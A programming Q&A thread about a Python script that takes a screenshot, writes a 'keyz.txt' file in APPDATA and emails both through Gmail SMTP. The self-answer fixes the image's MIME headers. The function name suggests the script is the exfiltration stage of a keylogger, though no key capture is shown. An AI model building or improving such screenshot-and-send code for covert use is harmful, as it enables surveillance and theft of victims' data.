# Python does not send screenshot to Email Correctly

Tags: python, email, email-attachments, smtplib

I have this concern. This python code is supposed to send 2 files, One is a Text file and the Screenshot. It sends the text file correctly to my Email, but it does not send the correct image associated with it to my email, Rather it sends it as a Buffered image and not the correct image to my email.

My code Looks somewhat Like this

```
import os
import pyautogui
import smtplib 
from email.mime.multipart import MIMEMultipart 
from email.mime.text import MIMEText 
from email.mime.base import MIMEBase 
from email import encoders 

def CaptureKeysAndScreenShtAndSendToEmail():
    pic= pyautogui.screenshot()
    pic.save(os.getenv('APPDATA')+ "\\"+ 'screenshot.png')  

    path = os.getenv('APPDATA')
    file = path + "\\" + 'keyz.txt'
    with open(file,'w') as f:
        data = 'Hello Jasmine!'
        f.write(data)

    fromAddr = "xxxxxx@gmail.com"
    ToAddr = "xxxxxx@gmail.com"

    msg = MIMEMultipart()
    msg['From'] = fromAddr
    msg['To'] = ToAddr
    msg['Subject'] = "Text File"
    body = "Test mail _ Attachment"
    msg.attach(MIMEText(body,'plain'))

    
    filename = file
    attachment = open(filename,"rb")
    p = MIMEBase('application','octet-stream')
    p.set_payload((attachment).read())
    encoders.encode_base64(p)
    p.add_header('Content-Disposition', "attachment; filename= %s" % filename) 
    msg.attach(p) 

    
    picturePath = os.getenv('APPDATA')+ "\\"+ 'screenshot.png'
    picattach = open(picturePath, "rb")
    x = MIMEBase('application','octet-stream')
    x.set_payload((picattach).read())
    encoders.encode_base64(x)
    x.add_header('Content-Disposition', "attachment; filename= %s" % picattach) 
    msg.attach(x) 

    s = smtplib.SMTP('smtp.gmail.com',587)
    s.starttls()
    s.login(fromAddr,"ssssss")
    text = msg.as_string()
    s.sendmail(fromAddr,ToAddr,text)
    s.quit()
    print('Done')


CaptureKeysAndScreenShtAndSendToEmail()
```

I think there is something i am not capturing correctly.

Answer (score 0):

Alas, I solved it.
It Sends Emails and pic Attachments to EMails now. All is good. Few Modifications changed everything

```
import os
import pyautogui
import smtplib 
from email.mime.multipart import MIMEMultipart 
from email.mime.text import MIMEText 
from email.mime.base import MIMEBase 
from email import encoders 

def CaptureKeysAndScreenShtAndSendToEmail():
    pic= pyautogui.screenshot()
    pic.save(os.getenv('APPDATA')+ "\\"+ 'screenshot.png')  

    path = os.getenv('APPDATA')
    file = path + "\\" + 'keyz.txt'
    with open(file,'w') as f:
        data = 'Hello Jasmine!'
        f.write(data)

    fromAddr = "xxxxxx@gmail.com"
    ToAddr = "xxxxxx@gmail.com"

    msg = MIMEMultipart()
    msg['From'] = fromAddr
    msg['To'] = ToAddr
    msg['Subject'] = "Text File"
    body = "Test mail _ Attachment"
    msg.attach(MIMEText(body,'plain'))

    
    filename = file
    attachment = open(filename,"rb")
    p = MIMEBase('application','octet-stream')
    p.set_payload((attachment).read())
    encoders.encode_base64(p)
    p.add_header('Content-Disposition', "attachment; filename= %s" % filename) 
    msg.attach(p) 

    
    picturePath = os.getenv('APPDATA')+ "\\"+ 'screenshot.png'
    picattach = open(picturePath, "rb")
    x = MIMEBase('image', 'png', filename='screenshot.png')
    x.set_payload((picattach).read())
    encoders.encode_base64(x)
    x.add_header('Content-Disposition', "attachment; filename= %s" % picattach) 
    x.add_header('X-Attachment-Id', '0')
    x.add_header('Content-ID', '<0>')
    msg.attach(x) 

    s = smtplib.SMTP('smtp.gmail.com',587)
    s.starttls()
    s.login(fromAddr,"sssssss")
    text = msg.as_string()
    s.sendmail(fromAddr,ToAddr,text)
    s.quit()
    print('Done')


CaptureKeysAndScreenShtAndSendToEmail()
```

Changing this

`x = MIMEBase('image', 'png', filename='screenshot.png')` and adding few other headers as this Changed all.

Headers

```
x.add_header('X-Attachment-Id', '0')
x.add_header('Content-ID', '<0>')
```